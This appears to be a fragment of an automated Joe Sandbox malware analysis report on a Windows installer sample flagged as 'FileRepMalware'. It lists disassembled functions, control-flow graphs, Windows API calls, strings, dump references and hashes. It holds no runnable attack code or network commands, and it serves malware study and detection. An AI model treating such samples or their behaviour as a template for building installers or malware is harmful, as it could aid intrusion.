GlobalAlloc GlobalLock 185->186 188 405735-40575c SendMessageW 186->188 188->188 189 40575e-405772 GlobalUnlock SetClipboardData CloseClipboard 188->189 189->170
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,00000403), ref: 0040544D
                                                                            • GetDlgItem.USER32(?,000003EE), ref: 0040545C
                                                                            • GetClientRect.USER32(?,?), ref: 00405499
                                                                            • GetSystemMetrics.USER32(00000002), ref: 004054A0
                                                                            • SendMessageW.USER32(?,00001061,00000000,?), ref: 004054C1
                                                                            • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004054D2
                                                                            • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004054E5
                                                                            • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004054F3
                                                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405506
                                                                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405528
                                                                            • ShowWindow.USER32(?,00000008), ref: 0040553C
                                                                            • GetDlgItem.USER32(?,000003EC), ref: 0040555D
                                                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040556D
                                                                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405586
                                                                            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405592
                                                                            • GetDlgItem.USER32(?,000003F8), ref: 0040546B
                                                                              • Part of subcall function 00404216: SendMessageW.USER32(00000028,?,00000001,00404041), ref: 00404224
                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004055AF
                                                                            • CreateThread.KERNELBASE(00000000,00000000,Function_00005383,00000000), ref: 004055BD
                                                                            • CloseHandle.KERNELBASE(00000000), ref: 004055C4
                                                                            • ShowWindow.USER32(00000000), ref: 004055E8
                                                                            • ShowWindow.USER32(?,00000008), ref: 004055ED
                                                                            • ShowWindow.USER32(00000008), ref: 00405637
                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566B
                                                                            • CreatePopupMenu.USER32 ref: 0040567C
                                                                            • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405690
                                                                            • GetWindowRect.USER32(?,?), ref: 004056B0
                                                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004056C9
                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405701
                                                                            • OpenClipboard.USER32(00000000), ref: 00405711
                                                                            • EmptyClipboard.USER32 ref: 00405717
                                                                            • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405723
                                                                            • GlobalLock.KERNEL32(00000000), ref: 0040572D
                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405741
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00405761
                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 0040576C
                                                                            • CloseClipboard.USER32 ref: 00405772
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                            • String ID: {$6B
                                                                            • API String ID: 590372296-3705917127
                                                                            • Opcode ID: bafaae828d30907193abfb7d0b2ebba1375cd8af34f5706ff9aabcfc974c4f7c
                                                                            • Instruction ID: d3ec127817543c8dcb48433ae4040966c093085d210dffb8a3526856162b3191
                                                                            • Opcode Fuzzy Hash: bafaae828d30907193abfb7d0b2ebba1375cd8af34f5706ff9aabcfc974c4f7c
                                                                            • Instruction Fuzzy Hash: B1B14A70900609FFDB119FA1DD89AAE7B79FB44354F00403AFA45B61A0CB754E52DF68
                                                                            Function 0040595A Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148filestringCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 499 40595a-405980 call 405c25 502 405982-405994 DeleteFileW 499->502 503 405999-4059a0 499->503 504 405b16-405b1a 502->504 505 4059a2-4059a4 503->505 506 4059b3-4059c3 call 40624c 503->506 507 405ac4-405ac9 505->507 508 4059aa-4059ad 505->508 514 4059d2-4059d3 call 405b69 506->514 515 4059c5-4059d0 lstrcatW 506->515 507->504 510 405acb-405ace 507->510 508->506 508->507 512 405ad0-405ad6 510->512 513 405ad8-405ae0 call 40658f 510->513 512->504 513->504 523 405ae2-405af6 call 405b1d call 405912 513->523 516 4059d8-4059dc 514->516 515->516 519 4059e8-4059ee lstrcatW 516->519 520 4059de-4059e6 516->520 522 4059f3-405a0f lstrlenW FindFirstFileW 519->522 520->519 520->522 524 405a15-405a1d 522->524 525 405ab9-405abd 522->525 539 405af8-405afb 523->539 540 405b0e-405b11 call 4052b0 523->540 528 405a3d-405a51 call 40624c 524->528 529 405a1f-405a27 524->529 525->507 527 405abf 525->527 527->507 541 405a53-405a5b 528->541 542 405a68-405a73 call 405912 528->542 531 405a29-405a31 529->531 532 405a9c-405aac FindNextFileW 529->532 531->528 535 405a33-405a3b 531->535 532->524 538 405ab2-405ab3 FindClose 532->538 535->528 535->532 538->525 539->512 545 405afd-405b0c call 4052b0 call 406012 539->545 540->504 541->532 546 405a5d-405a66 call 40595a 541->546 551 405a94-405a97 call 4052b0 542->551 552 405a75-405a78 542->552 545->504 546->532 551->532 555 405a7a-405a8a call 4052b0 call 406012 552->555 556 405a8c-405a92 552->556 555->532 556->532
                                                                            APIs
                                                                            • DeleteFileW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\,774D3420,00000000), ref: 00405983
                                                                            • lstrcatW.KERNEL32(004256F0,\*.*,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,774D3420,00000000), ref: 004059CB
                                                                            • lstrcatW.KERNEL32(?,0040A014,?,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,774D3420,00000000), ref: 004059EE
                                                                            • lstrlenW.KERNEL32(?,?,0040A014,?,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,774D3420,00000000), ref: 004059F4
                                                                            • FindFirstFileW.KERNELBASE(004256F0,?,?,?,0040A014,?,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,774D3420,00000000), ref: 00405A04
                                                                            • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405AA4
                                                                            • FindClose.KERNEL32(00000000), ref: 00405AB3
                                                                            Strings
                                                                            • "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe", xrefs: 0040595A
                                                                            • \*.*, xrefs: 004059C5
                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405968
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                            • String ID: "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                            • API String ID: 2035342205-2575430948
                                                                            • Opcode ID: cef271d36a4cb6b758dae5d81120ae6a1160f274867ba4d7352c158524ee07bb
                                                                            • Instruction ID: a8a76f5088e9b8e84a0c744efebc89a786f36fdc765849bba2b15b9d7042df22
                                                                            • Opcode Fuzzy Hash: cef271d36a4cb6b758dae5d81120ae6a1160f274867ba4d7352c158524ee07bb
                                                                            • Instruction Fuzzy Hash: BA41E230A01A14AACB21BB658C89ABF7778EF81764F50427FF801711D1D77C5982DEAE
                                                                            Function 00406956 Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 243907c00f3d7d55c33cca0d1e8b50e30fc2ef132c4317966eea85650a7ed6a7
                                                                            • Instruction ID: dcd014b85e7262d3741248fa227238ad6671e2837142342cd84456719761ddbf
                                                                            • Opcode Fuzzy Hash: 243907c00f3d7d55c33cca0d1e8b50e30fc2ef132c4317966eea85650a7ed6a7
                                                                            • Instruction Fuzzy Hash: 7FF17871D04229CBCF18CFA8C8946ADBBB0FF44305F25856ED856BB281D7386A86CF45
                                                                            Function 0040658F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FindFirstFileW.KERNELBASE(?,00426738,00425EF0,00405C6E,00425EF0,00425EF0,00000000,00425EF0,00425EF0,?,?,774D3420,0040597A,?,C:\Users\user\AppData\Local\Temp\,774D3420), ref: 0040659A
                                                                            • FindClose.KERNEL32(00000000), ref: 004065A6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Find$CloseFileFirst
                                                                            • String ID: 8gB
                                                                            • API String ID: 2295610775-1733800166
                                                                            • Opcode ID: 10d21b2891892a60ec94b320bc5d87934ec883ac9a5b90ef038b3d3a92de116a
                                                                            • Instruction ID: 94cc43f68e1cdd1d7b1eae1ec77a84073341a0d38183f0b632eac2f66d480838
                                                                            • Opcode Fuzzy Hash: 10d21b2891892a60ec94b320bc5d87934ec883ac9a5b90ef038b3d3a92de116a
                                                                            • Instruction Fuzzy Hash: 5DD01231509020ABC20157387D0C85BBA5C9F55331B129A37B466F52E4D7348C6286AC
                                                                            Function 004020FE Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040217D
                                                                            Strings
                                                                            • C:\Users\user\AppData\Roaming\euthanasic\satineredes\Gammastraales\Ekspertenhed\plyndrer, xrefs: 004021BD
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: CreateInstance
                                                                            • String ID: C:\Users\user\AppData\Roaming\euthanasic\satineredes\Gammastraales\Ekspertenhed\plyndrer
                                                                            • API String ID: 542301482-1185868749
                                                                            • Opcode ID: f9d162837d69daf770c0eabca54ae53132f7e60540a71a71b4ad6ecbd4f442c0
                                                                            • Instruction ID: 8d58e3acc7b173ba9b06918936dfe92dd1a067fa61399e551ad1d720d45e9931
                                                                            • Opcode Fuzzy Hash: f9d162837d69daf770c0eabca54ae53132f7e60540a71a71b4ad6ecbd4f442c0
                                                                            • Instruction Fuzzy Hash: A64148B5A00208AFCB10DFE4C988AAEBBB5FF48314F20457AF515EB2D1DB799941CB44
                                                                            Function 00402862 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 00402871
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: FileFindFirst
                                                                            • String ID:
                                                                            • API String ID: 1974802433-0
                                                                            • Opcode ID: d94b6344d4f0efc598b909131905a4996fdae2a99134213a4831ed8039556d1b
                                                                            • Instruction ID: 457e94eee93b26a2a7a920d72ffedce9eee0ef57ab85e6e0c0e07cda1b0ec514
                                                                            • Opcode Fuzzy Hash: d94b6344d4f0efc598b909131905a4996fdae2a99134213a4831ed8039556d1b
                                                                            • Instruction Fuzzy Hash: 72F08271A04104EFD710EBA4DD49AADB378EF00314F2045BBF911F21D1D7B44E409B2A
                                                                            Function 00403D08 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346windowstringCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 190 403d08-403d1a 191 403d20-403d26 190->191 192 403e5b-403e6a 190->192 191->192 195 403d2c-403d35 191->195 193 403eb9-403ece 192->193 194 403e6c-403eb4 GetDlgItem * 2 call 4041e1 SetClassLongW call 40140b 192->194 199 403ed0-403ed3 193->199 200 403f0e-403f13 call 40422d 193->200 194->193 196 403d37-403d44 SetWindowPos 195->196 197 403d4a-403d4d 195->197 196->197 201 403d67-403d6d 197->201 202 403d4f-403d61 ShowWindow 197->202 204 403ed5-403ee0 call 401389 199->204 205 403f06-403f08 199->205 212 403f18-403f33 200->212 207 403d89-403d8c 201->207 208 403d6f-403d84 DestroyWindow 201->208 202->201 204->205 227 403ee2-403f01 SendMessageW 204->227 205->200 211 4041ae 205->211 218 403d8e-403d9a SetWindowLongW 207->218 219 403d9f-403da5 207->219 215 40418b-404191 208->215 217 4041b0-4041b7 211->217 213 403f35-403f37 call 40140b 212->213 214 403f3c-403f42 212->214 213->214 223 403f48-403f53 214->223 224 40416c-404185 DestroyWindow EndDialog 214->224 215->211 222 404193-404199 215->222 218->217 225 403e48-403e56 call 404248 219->225 226 403dab-403dbc GetDlgItem 219->226 222->211 228 40419b-4041a4 ShowWindow 222->228 223->224 229 403f59-403fa6 call 40626e call 4041e1 * 3 GetDlgItem 223->229 224->215 225->217 230 403ddb-403dde 226->230 231 403dbe-403dd5 SendMessageW IsWindowEnabled 226->231 227->217 228->211 260 403fb0-403fec ShowWindow KiUserCallbackDispatcher call 404203 EnableWindow 229->260 261 403fa8-403fad 229->261 234 403de0-403de1 230->234 235 403de3-403de6 230->235 231->211 231->230 238 403e11-403e16 call 4041ba 234->238 239 403df4-403df9 235->239 240 403de8-403dee 235->240 238->225 241 403dfb-403e01 239->241 242 403e2f-403e42 SendMessageW 239->242 240->242 245 403df0-403df2 240->245 246 403e03-403e09 call 40140b 241->246 247 403e18-403e21 call 40140b 241->247 242->225 245->238 256 403e0f 246->256 247->225 257 403e23-403e2d 247->257 256->238 257->256 264 403ff1 260->264 265 403fee-403fef 260->265 261->260 266 403ff3-404021 GetSystemMenu EnableMenuItem SendMessageW 264->266 265->266 267 404023-404034 SendMessageW 266->267 268 404036 266->268 269 40403c-40407b call 404216 call 403ce9 call 40624c lstrlenW call 40626e SetWindowTextW call 401389 267->269 268->269 269->212 280 404081-404083 269->280 280->212 281 404089-40408d 280->281 282 4040ac-4040c0 DestroyWindow 281->282 283 40408f-404095 281->283 282->215 285 4040c6-4040f3 CreateDialogParamW 282->285 283->211 284 40409b-4040a1 283->284 284->212 286 4040a7 284->286 285->215 287 4040f9-404150 call 4041e1 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 285->287 286->211 287->211 292 404152-404165 ShowWindow call 40422d 287->292 294 40416a 292->294 294->215
                                                                            APIs
                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D44
                                                                            • ShowWindow.USER32(?), ref: 00403D61
                                                                            • DestroyWindow.USER32 ref: 00403D75
                                                                            • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403D91
                                                                            • GetDlgItem.USER32(?,?), ref: 00403DB2
                                                                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403DC6
                                                                            • IsWindowEnabled.USER32(00000000), ref: 00403DCD
                                                                            • GetDlgItem.USER32(?,00000001), ref: 00403E7B
                                                                            • GetDlgItem.USER32(?,00000002), ref: 00403E85
                                                                            • SetClassLongW.USER32(?,000000F2,?), ref: 00403E9F
                                                                            • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403EF0
                                                                            • GetDlgItem.USER32(?,00000003), ref: 00403F96
                                                                            • ShowWindow.USER32(00000000,?), ref: 00403FB7
                                                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403FC9
                                                                            • EnableWindow.USER32(?,?), ref: 00403FE4
                                                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403FFA
                                                                            • EnableMenuItem.USER32(00000000), ref: 00404001
                                                                            • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404019
                                                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040402C
                                                                            • lstrlenW.KERNEL32(004236E8,?,004236E8,00000000), ref: 00404056
                                                                            • SetWindowTextW.USER32(?,004236E8), ref: 0040406A
                                                                            • ShowWindow.USER32(?,0000000A), ref: 0040419E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                            • String ID: 6B
                                                                            • API String ID: 3282139019-4127139157
                                                                            • Opcode ID: 63d51f50975af08fe142ac7da96eaef83eb7a6380e3783fe0f342e2b0760fb65
                                                                            • Instruction ID: aba62e874285a6ff7dd8be06960963098d8abb6283381b386aa5fa49e43a5191
                                                                            • Opcode Fuzzy Hash: 63d51f50975af08fe142ac7da96eaef83eb7a6380e3783fe0f342e2b0760fb65
                                                                            • Instruction Fuzzy Hash: 35C1C071640205BBDB216F61EE88E2B3A6CFB95705F40053EF641B52F0CB3A5992DB2D
                                                                            Function 0040395A Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215stringregistryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 295 40395a-403972 call 406626 298 403974-403984 call 406193 295->298 299 403986-4039bd call 40611a 295->299 308 4039e0-403a09 call 403c30 call 405c25 298->308 304 4039d5-4039db lstrcatW 299->304 305 4039bf-4039d0 call 40611a 299->305 304->308 305->304 313 403a9b-403aa3 call 405c25 308->313 314 403a0f-403a14 308->314 320 403ab1-403ad6 LoadImageW 313->320 321 403aa5-403aac call 40626e 313->321 314->313 316 403a1a-403a42 call 40611a 314->316 316->313 322 403a44-403a48 316->322 324 403b57-403b5f call 40140b 320->324 325 403ad8-403b08 RegisterClassW 320->325 321->320 326 403a5a-403a66 lstrlenW 322->326 327 403a4a-403a57 call 405b4a 322->327 338 403b61-403b64 324->338 339 403b69-403b74 call 403c30 324->339 328 403c26 325->328 329 403b0e-403b52 SystemParametersInfoW CreateWindowExW 325->329 333 403a68-403a76 lstrcmpiW 326->333 334 403a8e-403a96 call 405b1d call 40624c 326->334 327->326 332 403c28-403c2f 328->332 329->324 333->334 337 403a78-403a82 GetFileAttributesW 333->337 334->313 341 403a84-403a86 337->341 342 403a88-403a89 call 405b69 337->342 338->332 348 403b7a-403b94 ShowWindow call 4065b6 339->348 349 403bfd-403bfe call 405383 339->349 341->334 341->342 342->334 354 403ba0-403bb2 GetClassInfoW 348->354 355 403b96-403b9b call 4065b6 348->355 353 403c03-403c05 349->353 356 403c07-403c0d 353->356 357 403c1f-403c21 call 40140b 353->357 360 403bb4-403bc4 GetClassInfoW RegisterClassW 354->360 361 403bca-403bed DialogBoxParamW call 40140b 354->361 355->354 356->338 362 403c13-403c1a call 40140b 356->362 357->328 360->361 366 403bf2-403bfb call 4038aa 361->366 362->338 366->332
                                                                            APIs
                                                                              • Part of subcall function 00406626: GetModuleHandleA.KERNEL32(?,00000020,?,004033AF,0000000A), ref: 00406638
                                                                              • Part of subcall function 00406626: GetProcAddress.KERNEL32(00000000,?), ref: 00406653
                                                                            • lstrcatW.KERNEL32(1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000,00000002,C:\Users\user\AppData\Local\Temp\,774D3420,"C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe",00000000), ref: 004039DB
                                                                            • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\euthanasic\satineredes\Gammastraales,1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A5B
                                                                            • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\euthanasic\satineredes\Gammastraales,1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000), ref: 00403A6E
                                                                            • GetFileAttributesW.KERNEL32(: Completed), ref: 00403A79
                                                                            • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\euthanasic\satineredes\Gammastraales), ref: 00403AC2
                                                                              • Part of subcall function 00406193: wsprintfW.USER32 ref: 004061A0
                                                                            • RegisterClassW.USER32(004291A0), ref: 00403AFF
                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B17
                                                                            • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B4C
